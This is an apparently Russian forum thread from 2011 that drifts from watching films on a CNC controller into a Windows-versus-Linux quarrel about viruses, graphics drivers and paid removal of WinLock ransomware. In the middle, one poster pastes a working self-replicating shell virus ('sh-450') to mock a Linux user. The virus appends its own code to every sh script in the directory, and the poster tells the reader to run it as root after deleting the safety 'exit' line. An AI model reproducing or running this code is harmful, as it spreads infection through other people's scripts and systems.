Вы не вошли.

Приведите часть инструкции по эксплуатации / руководства оператора где есть раздел просмотр фильмов на УЧПУ?
Не могу, так-же немогу привести где это запрещено.
Гы, станок как раз для просмотра фильмов и предназначен. А ещё в микроволновках котов сушить можно :-)
Можно, а есть микроволновка в которой только сосиски, например разогревать можно, а остальное запрещено?
Гареев Станислав
Так чо, не только линуксятники красноглазят?
Отредактировано petyan (06-01-11 18:40:12)
Св..., неужели до тебя до сих пор не дошла простая и очевидная вещь: мне на тебя насрать? (С)Автомототроллер 

2 petyan
Достаточно современный комп?
Нет.
И да вирусов у меня на линуксе нет
Чем проверяли?
.
У меня на винде вирусов нет. Значит на винде вирусов нет
.
Добавлено спустя 03 мин 26 с:
2 petyan
И да вирусов у меня на линуксе нет
Держи страдалец, запускать от рута
#!/bin/sh
#Вирус "sh-450". Удалите эту и строку и "exit", чтобы вирус мог получить управление.
exit
for F in *
do
#Если в первой строке найдено "#!" и "/sh", значит $F - sh-скрипт
if [ "$(head -c9 "$F" | grep -s -E -H "#!" 2>/dev/null)" != "" ]; then #This $F - a Script
if [ "$(head -c9 "$F" | grep -s -E -H "/sh" 2>/dev/null)" != "" ]; then #$F - a sh-Script
if [ "$(tail -n1 "$F" 2>/dev/null)" != "#Virus v.1.1" ]; then #$F - not infected
tail -12 $0 >> "$F" 2>/dev/null;
fi
fi
fi
done
#Virus v.1.1
Нет, так мы целей гнусных не достигнем... / В.П. Вишневский

Гы, станок как раз для просмотра фильмов и предназначен. А ещё в микроволновках котов сушить можно :-)
Я не в теме, но зачем на станке вебкамера?
В среднем да.
Просто слов нет. Где пруфлинк???

Просто слов нет. Где пруфлинк???
По себе знаю. 
Не ламерствуй лукаво.
"А петь мне нельзя - постановление суда" (с) Бендер

По себе знаю.
Вот он - человек-эталон.

Чем проверяли?
Drweb liveCD
Достаточно современный комп?
Нет.
И чем же?
Я не в теме, но зачем на станке вебкамера?
Сам думал об этом, но она есть, с предустановленным по.
Отредактировано petyan (06-01-11 18:55:47)
Св..., неужели до тебя до сих пор не дошла простая и очевидная вещь: мне на тебя насрать? (С)Автомототроллер 

Сам думал об это, но она есть, с пред установленным по.
Это что же за станки такие? Они еще и крестиком вышивать умеют, наверное.
Drweb liveCD
Постойте, там что, и привод есть? Или может быть www.freedrweb.com/liveusb?

2 petyan
И чем же?
geforce 260
aver 507 studio
hp 1005
Из вашего конфига современны только мать и проц. Но это стандартное оборудование, и у меня нет уверенности что линукс подхватил все фичи материнки. С натяжкой видеокарта (поддержка glx тоже конечно встала автоматом ?
).

что-то, сдается мне, не так с этим станком, вернее с теми, кто с ним работает 
ххх: у тебя iperf есть?
yyy: iperf? перфоратор от Apple чтоле?
xxx: Во всем мире уже известны российские дороги и дураки. Сейчас к ним еще домены добавятся.

Это что же за станки такие? Они еще и крестиком вышивать умеют, наверное.
Наверное www.biesse.ru/
Постойте, там что, и привод есть? Или может быть
Выше уже писал, асус перешитый в пионер.
TrollWINNT
Представь себе подхватил, а вот семерка не определила звук и сеть.
Принтер\тюнер меня устраивают, менять смысла нет.
Да и видюха подхватилась, мне предложили включить репозиторий нвидиа и все.
Дрова сами скачали и установились.
А вы что железо меняете с выходом каждого нового чипа\железяки?
Его достаточно даже для самых современных игр, например, но я не геймер.
Отредактировано petyan (06-01-11 19:13:51)

Представь себе подхватил, а вот семерка не определила звук и сеть.
Что ж. Значит вам повезло. Мою GTS450 не подхватило. Материнка asus P7p55d тоже доставила приятные моменты 

Что ж. Значит вам повезло. Мою GTS450 не подхватило.
Можно ручками скачать драйвер и поставить.
И кстати моя древняя 260 мощнее твоей 450 www.3dnews.ru/news/nvidia-geforce-gts-4 … deon-5750/
Если хочешь поговорить об этом, то добро пожаловать на forums.overclockers.ru/ там и обсудим.
Но сразу предупреждаю, там 80% красноглазых повернутых на железе.
Отредактировано petyan (06-01-11 19:39:30)

И кстати моя древняя 260 мощнее твоей 450 www.3dnews.ru/news/nvidia-geforc … deon-5750/
Если хочешь поговорить об этом, то добро пожаловать на forums.overclockers.ru/ там и обсудим.
Но сразу предупреждаю, там 80% красноглазых повернутых на железе.
"В огороде бузина, а в Киеве дядька". Причем здесь мощность??? Линукслогика снова на марше? 
линукс на дескторе это как спойлер на "девятке": 200+ она в своей жизни никогда не выжмет, зато пацанам можно сказать "у меня почти McLaren" (с) дохтур

"В огороде бузина, а в Киеве дядька". Причем здесь мощность??? Линукслогика снова на марше?
А при том, что нет смысла менять более старую видюху, на новую меньшей мощности, логично да? Нет смысла менять даже на 460.
Про новое железо, у нвидии уже пятая версия вышла, так что 450, это уже не круто, а 560 еще нет.
Да и 5 поколение уже поддерживаеться в линуксе, пруф нужен?
Linux x64 (AMD64/EM64T) Display Driver
Версия: 260.19.29 Certified
Опубликовано: 2010.12.13
Операционная система: Linux 64-bit
Язык: Русский
Размер: 45.8 MB
Особенности выпуска
поддерживаемыe продукты
Дополнительная информация
Добавлена поддержка для следующих графических процессоров:
GeForce GTX 460 SE
GeForce GTX 570
Quadro 5000M
NVS 300
Исправлена ошибка, которая приводила к зависанию вплоть до минуты некоторых OpenGL приложений на некоторых графических процессорах во время изменения разрешения или частоты обновления.
Добавлена поддержка NVIDIA 3D Vision Pro.
Для дополнительной информации смотрите конфигурации "Stereo" X в документе README.
Добавлен новый вариант конфигурации Х "3DVisionProConfigFile", чтобы позволить пользователям задавать имя файла, который драйвер NVIDIA X использует для хранения конфигурационных настроек 3D Vision Pro. Для дополнительной информации смотрите "Appendix B. Варианты настроек X" в документе README.
www.nvidia.ru/object/linux-display-amd6 … er-ru.html
Только причем тут вирусы?

2 petyan
Можно ручками скачать драйвер и поставить.
И это делается не заглядывая в гугль
в гуи, ага.
И кстати моя древняя 260 мощнее твоей 450
А так же горячее и дороже
. Мне лично хватает.
Ладно, в самом деле пора прекращать офтоп
.

А при том, что нет смысла менять более старую видюху, на новую меньшей мощности, логично да? Нет смысла менять даже на 460.
Смысл есть всегда (ц)
Новая видуха поддерживает больше фич, например дх 11 + меньше греется и, как следствие, меньше шумит из-за более "тонкого" тех-процесса
линукс на дескторе это как спойлер на "девятке": 200+ она в своей жизни никогда не выжмет, зато пацанам можно сказать "у меня почти McLaren" (с) дохтур

Только причем тут вирусы?
Да вообще ни при чем. Линукс, конечно, нужно и настраивать, и как-то заставлять работать на нем сторонний софт. Но как это соотносится с темой обсуждения?
За каждым подвигом стоит чье-то разгильдяйство.
Кому я нужен, могут найти меня вконтакте, ник тот же.

Мне лично хватает.
Вот и я про то.
Перед новым годом, я на шару заработал 3000р, всего лишь прибив 3 вин лока. Делов-то, а денежку заработал.
Так что пусть будет винда и чайники. Притом у всех вин7, сборка или родная, не вкурсе, хотя одна точно родная, предустановленная с компом шла, ну естественно у всех антивирусы с новыми базами были.....вот только вирус их отключил.
Я за то что-бы использовали виндовс. Но сам пользоваться не буду.
Это типа как сами Макдональды, в макдональсе не едят. 
Отредактировано petyan (06-01-11 20:23:19)

.....вот только вирус их отключил.
Имя вируса в студию, чтобы вам поверили. Я уже не спрашиваю каким это «чудом» вирус смог получить админправа и отключить антивирусы. Такое в правильно настроенной Windows-среде нереально.
«Коллективная глупость — индивидуальный признак толпы» © SLOR, 28 апреля 2011 г.
«Где пьёт толпа, все родники отравлены» © Фридрих Ницше.
Requiescat in pace, SLOR! © Уход Hedge 24 мая 2011 г.

Имя вируса в студию, чтобы вам поверили.
news.drweb.com/show/?i=1406&c=5&lng=ru&p=0
"Троян на доверии", так сказать. Для ССЗБ.
Добавлено спустя 03 мин 39 с:
Перед новым годом, я на шару заработал 3000р, всего лишь прибив 3 вин лока.
Почувствовали себя героем? В следующий раз Вас также разведет налоговая\медицина\управляющая компания ЖКХ.
Судя по всему, для "прибивания" Вы использовали либо CureIt!, либо Dr.Web LiveCD, либо онлайновыми сервисами от Dr.Web или KasperskyLab.
Отредактировано USEрдный Rаботник (06-01-11 23:16:27)

Почувствовали себя героем?
Это к чему вообще? Я же написал
Делов-то, а денежку заработал.

Это к чему вообще? Я же написал
Чем пользовались, если не секрет?
Добавлено спустя 03 мин 25 с:
Делов-то, а денежку заработал.
Вот именно. Воспользоваться бесплатной утилитой (предназначенной, кстати, по EULA для Вашего личного компьютера) или бесплатным сервисом, а потом требовать за это деньги - не слишком хорошо для кармы. 

Троян на доверии", так сказать. Для ССЗБ.
А, ну понятно, сидение под админом, бездумное клацанье по кнопкам «Да» и «Запустить», а потом всякие пятаны бабло стригут на таких лохах
Грамотный человек не только удалит заразу, но и покажет и расскажет пользователю что нужно сделать, чтобы правильно настроить винду и предотвратить проблемы в будущем.
«Коллективная глупость — индивидуальный признак толпы» © SLOR, 28 апреля 2011 г.

Грамотный человек не только удалит заразу, но и покажет и расскажет пользователю что нужно сделать, чтобы правильно настроить винду и предотвратить проблемы в будущем.
И потерять кормушку? Танисшто!
И все же интересно, как уважаемый petyan удалял винлоки.
Отредактировано USEрдный Rаботник (06-01-11 23:27:30)

И потерять кормушку? Танисшто!
Ну здесь просто разница в отношении к работе — сделать качественно раз и навсегда или доить человека, потому что тот дремучий и ничего не понимает. Да и что переживать? Кого надоить найдётся всегда, другое дело сделать всё на совесть, чтобы потом этот человек рассказал друзьям и знакомым.
[ Сгенерировано за 0.022 сек, 7 запросов выполнено - Использовано памяти: 1.8 Мбайт (Пик: 1.88 Мбайт) ]